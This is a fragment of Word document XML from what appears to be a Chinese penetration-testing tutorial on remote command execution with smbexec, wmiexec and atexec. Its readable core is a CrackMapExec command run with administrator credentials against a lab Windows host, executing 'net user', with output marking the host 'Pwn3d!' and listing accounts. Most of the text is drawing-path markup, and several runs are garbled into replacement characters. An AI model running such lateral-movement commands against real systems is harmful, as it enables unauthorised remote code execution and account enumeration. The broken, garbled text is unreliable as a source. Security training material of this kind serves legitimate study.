          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmiex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="248" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>于smbexec执行Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.6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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐exec‐m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ethod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smbexec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‐x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'net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user'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.6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5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BMI9HGC42S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Windows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Web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Server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2008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R2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760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pP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x64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name:WIN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5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BMI9HGC42S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domain:WIN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5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BMI9HGC42S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signing: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False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SM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Bv1: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True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4550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.6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5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BMI9HGC42S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+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5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BMI9HGC42S\administrator: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123456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Pwn3d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!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)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4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.6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5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BMI9HGC42S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+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Executed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command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via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smbexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="66" w:after="0" w:line="179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3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.6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5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BMI9HGC42S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\\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Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>���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û</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>��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ʻ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="150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.6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WIN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5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BMI9HGC42S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121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7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.6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5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BMI9HGC42S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‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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.6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5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BMI9HGC42S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Administrator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Guest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0.0pt;width:0.0pt;height:99.524pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,1990">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:1990" coordorigin="10402,0" coordsize="0,1990" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,2,10402,3,10402,3,10402,4,10402,5,10402,6,10402,8,10402,9,10402,10,10402,12,10402,14,10402,16,10402,18,10402,20,10402,23,10402,25,10402,28,10402,31,10402,35,10402,38,10402,42,10402,46,10402,50,10402,55,10402,59,10402,64,10402,70,10402,75,10402,81,10402,87,10402,93,10402,100,10402,107,10402,114,10402,122,10402,130,10402,138,10402,147,10402,156,10402,166,10402,175,10402,185,10402,196,10402,207,10402,218,10402,230,10402,242,10402,255,10402,268,10402,281,10402,295,10402,309,10402,324,10402,339,10402,355,10402,371,10402,388,10402,405,10402,422,10402,440,10402,459,10402,478,10402,498,10402,518,10402,539,10402,560,10402,582,10402,604,10402,627,10402,651,10402,675,10402,700,10402,725,10402,751,10402,777,10402,804,10402,832,10402,861,10402,890,10402,919,10402,950,10402,981,10402,1012,10402,1045,10402,1078,10402,1111,10402,1146,10402,1181,10402,1216,10402,1253,10402,1290,10402,1328,10402,1367,10402,1406,10402,1447,10402,1487,10402,1529,10402,1572,10402,1615,10402,1659,10402,1704,10402,1749,10402,1796,10402,1843,10402,1891,10402,1940,10402,1990e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,999l1517,999,1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:350" coordorigin="1490,1630" coordsize="8990,350" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1650,10484,1651,10484,1652,10484,1652,10484,1653,10484,1654,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1659,10484,1660,10484,1661,10484,1662,10484,1663,10484,1665,10484,1666,10484,1667,10484,1669,10484,1670,10484,1672,10484,1674,10484,1675,10484,1677,10484,1679,10484,1681,10484,1683,10484,1685,10484,1687,10484,1689,10484,1691,10484,1694,10484,1696,10484,1699,10484,1701,10484,1704,10484,1706,10484,1709,10484,1712,10484,1715,10484,1718,10484,1721,10484,1725,10484,1728,10484,1731,10484,1735,10484,1738,10484,1742,10484,1746,10484,1750,10484,1754,10484,1758,10484,1762,10484,1766,10484,1771,10484,1775,10484,1780,10484,1784,10484,1789,10484,1794,10484,1799,10484,1804,10484,1810,10484,1815,10484,1820,10484,1826,10484,1832,10484,1838,10484,1844,10484,1850,10484,1856,10484,1862,10484,1869,10484,1875,10484,1882,10484,1889,10484,1896,10484,1903,10484,1910,10484,1917,10484,1925,10484,1933,10484,1940,10484,1948,10484,1956,10484,1965,10484,1973,10484,1981,10484,1990,10484,1990,10484,1990,10484,1990,10484,1990,10484,1990,10484,1990,10483,1990,10482,1990,10482,1990,10480,1990,10479,1990,10477,1990,10475,1990,10473,1990,10470,1990,10466,1990,10462,1990,10458,1990,10453,1990,10448,1990,10442,1990,10435,1990,10428,1990,10419,1990,10411,1990,10401,1990,10391,1990,10379,1990,10367,1990,10354,1990,10340,1990,10326,1990,10310,1990,10293,1990,10275,1990,10256,1990,10236,1990,10215,1990,10192,1990,10168,1990,10143,1990,10117,1990,10090,1990,10061,1990,10031,1990,9999,1990,9966,1990,9931,1990,9895,1990,9858,1990,9819,1990,9778,1990,9735,1990,9691,1990,9646,1990,9598,1990,9549,1990,9498,1990,9445,1990,9391,1990,9334,1990,9275,1990,9215,1990,9153,1990,9088,1990,9022,1990,8953,1990,8883,1990,8810,1990,8735,1990,8658,1990,8578,1990,8497,1990,8413,1990,8326,1990,8238,1990,8146,1990,8053,1990,7957,1990,7859,1990,7758,1990,7654,1990,7548,1990,7439,1990,7328,1990,7214,1990,7097,1990,6977,1990,6855,1990,6730,1990,6602,1990,6471,1990,6337,1990,6201,1990,6061,1990,5918,1990,5773,1990,5624,1990,5472,1990,5317,1990,5159,1990,4997,1990,4833,1990,4665,1990,4494,1990,4319,1990,4141,1990,3960,1990,3776,1990,3587,1990,3396,1990,3201,1990,3002,1990,2800,1990,2594,1990,2385,1990,2172,1990,1955,1990,1734,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1989,1510,1989,1510,1989,1510,1989,1510,1989,1510,1989,1510,1988,1510,1988,1510,1988,1510,1988,1510,1987,1510,1987,1510,1986,1510,1986,1510,1986,1510,1985,1510,1984,1510,1984,1510,1983,1510,1983,1510,1982,1510,1981,1510,1980,1510,1980,1510,1979,1510,1978,1510,1977,1510,1976,1510,1975,1510,1974,1510,1973,1510,1971,1510,1970,1510,1969,1510,1967,1510,1966,1510,1964,1510,1963,1510,1961,1510,1960,1510,1958,1510,1956,1510,1954,1510,1952,1510,1950,1510,1948,1510,1946,1510,1944,1510,1941,1510,1939,1510,1936,1510,1934,1510,1931,1510,1928,1510,1926,1510,1923,1510,1920,1510,1917,1510,1914,1510,1910,1510,1907,1510,1904,1510,1900,1510,1896,1510,1893,1510,1889,1510,1885,1510,1881,1510,1877,1510,1873,1510,1869,1510,1864,1510,1860,1510,1855,1510,1850,1510,1846,1510,1841,1510,1836,1510,1830,1510,1825,1510,1820,1510,1814,1510,1809,1510,1803,1510,1797,1510,1791,1510,1785,1510,1779,1510,1773,1510,1766,1510,1760,1510,1753,1510,1746,1510,1739,1510,1732,1510,1725,1510,1717,1510,1710,1510,1702,1510,1694,1510,1687,1510,1678,1510,1670,1510,1662,1510,1653,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:98.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1970" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:1970;width:8990;height:10" coordorigin="1490,1970" coordsize="8990,10" path="m1510,1982l1510,1982,1510,1982,1510,1982,1510,1982,1510,1982,1510,1982,1511,1982,1512,1982,1512,1982,1514,1982,1515,1982,1517,1982,1519,1982,1521,1982,1524,1982,1528,1982,1532,1982,1536,1982,1541,1982,1546,1982,1552,1982,1559,1982,1566,1982,1575,1982,1583,1982,1593,1982,1603,1982,1615,1982,1627,1982,1640,1982,1654,1982,1668,1982,1684,1982,1701,1982,1719,1982,1738,1982,1758,1982,1780,1982,1802,1982,1826,1982,1851,1982,1877,1982,1904,1982,1933,1982,1963,1982,1995,1982,2028,1982,2063,1982,2099,1982,2136,1982,2175,1982,2216,1982,2259,1982,2303,1982,2348,1982,2396,1982,2445,1982,2496,1982,2549,1982,2604,1982,2660,1982,2719,1982,2779,1982,2841,1982,2906,1982,2972,1982,3041,1982,3112,1982,3184,1982,3259,1982,3336,1982,3416,1982,3498,1982,3582,1982,3668,1982,3757,1982,3848,1982,3941,1982,4037,1982,4136,1982,4236,1982,4340,1982,4446,1982,4555,1982,4666,1982,4780,1982,4897,1982,5017,1982,5139,1982,5264,1982,5392,1982,5523,1982,5657,1982,5793,1982,5933,1982,6076,1982,6222,1982,6370,1982,6522,1982,6677,1982,6835,1982,6997,1982,7161,1982,7329,1982,7500,1982,7675,1982,7853,1982,8034,1982,8219,1982,8407,1982,8598,1982,8793,1982,8992,1982,9194,1982,9400,1982,9609,1982,9823,1982,10039,1982,10260,1982,10484,1982e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:81.599pt;width:445.800pt;height:17.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId24" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:244.500pt;width:0.500pt;height:148.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,4890" coordsize="10,2970">
        <v:shape style="position:absolute;left:10390;top:4890;width:10;height:2970" coordorigin="10390,4890" coordsize="10,2970" path="m10402,4901l10402,4901,10402,4901,10402,4901,10402,4902,10402,4902,10402,4902,10402,4902,10402,4902,10402,4902,10402,4903,10402,4903,10402,4904,10402,4904,10402,4905,10402,4906,10402,4907,10402,4909,10402,4910,10402,4912,10402,4913,10402,4916,10402,4918,10402,4920,10402,4923,10402,4926,10402,4929,10402,4932,10402,4936,10402,4940,10402,4944,10402,4949,10402,4954,10402,4959,10402,4965,10402,4970,10402,4977,10402,4983,10402,4990,10402,4998,10402,5006,10402,5014,10402,5022,10402,5031,10402,5041,10402,5051,10402,5061,10402,5072,10402,5084,10402,5095,10402,5108,10402,5121,10402,5134,10402,5148,10402,5163,10402,5178,10402,5193,10402,5210,10402,5226,10402,5244,10402,5262,10402,5280,10402,5300,10402,5320,10402,5340,10402,5361,10402,5383,10402,5406,10402,5429,10402,5453,10402,5478,10402,5503,10402,5529,10402,5556,10402,5584,10402,5612,10402,5642,10402,5672,10402,5702,10402,5734,10402,5766,10402,5800,10402,5834,10402,5869,10402,5905,10402,5941,10402,5979,10402,6017,10402,6057,10402,6097,10402,6138,10402,6180,10402,6224,10402,6268,10402,6313,10402,6359,10402,6406,10402,6454,10402,6503,10402,6553,10402,6604,10402,6656,10402,6709,10402,6763,10402,6819,10402,6875,10402,6932,10402,6991,10402,7051,10402,7112,10402,7174,10402,7237,10402,7301,10402,7366,10402,7433,10402,7501,10402,7570,10402,7640,10402,7711,10402,7784,10402,7858e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:244.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4890" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:4890;width:8990;height:670" coordorigin="1490,4890" coordsize="8990,670" path="m1510,4901l1510,4901,1510,4901,1510,4901,1510,4901,1510,4901,1510,4901,1511,4901,1512,4901,1512,4901,1514,4901,1515,4901,1517,4901,1519,4901,1521,4901,1524,4901,1528,4901,1532,4901,1536,4901,1541,4901,1546,4901,1552,4901,1559,4901,1566,4901,1575,4901,1583,4901,1593,4901,1603,4901,1615,4901,1627,4901,1640,4901,1654,4901,1668,4901,1684,4901,1701,4901,1719,4901,1738,4901,1758,4901,1780,4901,1802,4901,1826,4901,1851,4901,1877,4901,1904,4901,1933,4901,1963,4901,1995,4901,2028,4901,2063,4901,2099,4901,2136,4901,2175,4901,2216,4901,2259,4901,2303,4901,2348,4901,2396,4901,2445,4901,2496,4901,2549,4901,2604,4901,2660,4901,2719,4901,2779,4901,2841,4901,2906,4901,2972,4901,3041,4901,3112,4901,3184,4901,3259,4901,3336,4901,3416,4901,3498,4901,3582,4901,3668,4901,3757,4901,3848,4901,3941,4901,4037,4901,4136,4901,4236,4901,4340,4901,4446,4901,4555,4901,4666,4901,4780,4901,4897,4901,5017,4901,5139,4901,5264,4901,5392,4901,5523,4901,5657,4901,5793,4901,5933,4901,6076,4901,6222,4901,6370,4901,6522,4901,6677,4901,6835,4901,6997,4901,7161,4901,7329,4901,7500,4901,7675,4901,7853,4901,8034,4901,8219,4901,8407,4901,8598,4901,8793,4901,8992,4901,9194,4901,9400,4901,9609,4901,9823,4901,10039,4901,10260,4901,10484,4901,10484,4901,10484,4901,10484,4901,10484,4901,10484,4901,10484,4902,10484,4902,10484,4902,10484,4902,10484,4902,10484,4902,10484,4902,10484,4902,10484,4902,10484,4903,10484,4903,10484,4903,10484,4903,10484,4904,10484,4904,10484,4905,10484,4905,10484,4906,10484,4906,10484,4907,10484,4908,10484,4908,10484,4909,10484,4910,10484,4911,10484,4912,10484,4913,10484,4914,10484,4916,10484,4917,10484,4918,10484,4920,10484,4921,10484,4923,10484,4925,10484,4927,10484,4928,10484,4930,10484,4933,10484,4935,10484,4937,10484,4940,10484,4942,10484,4945,10484,4948,10484,49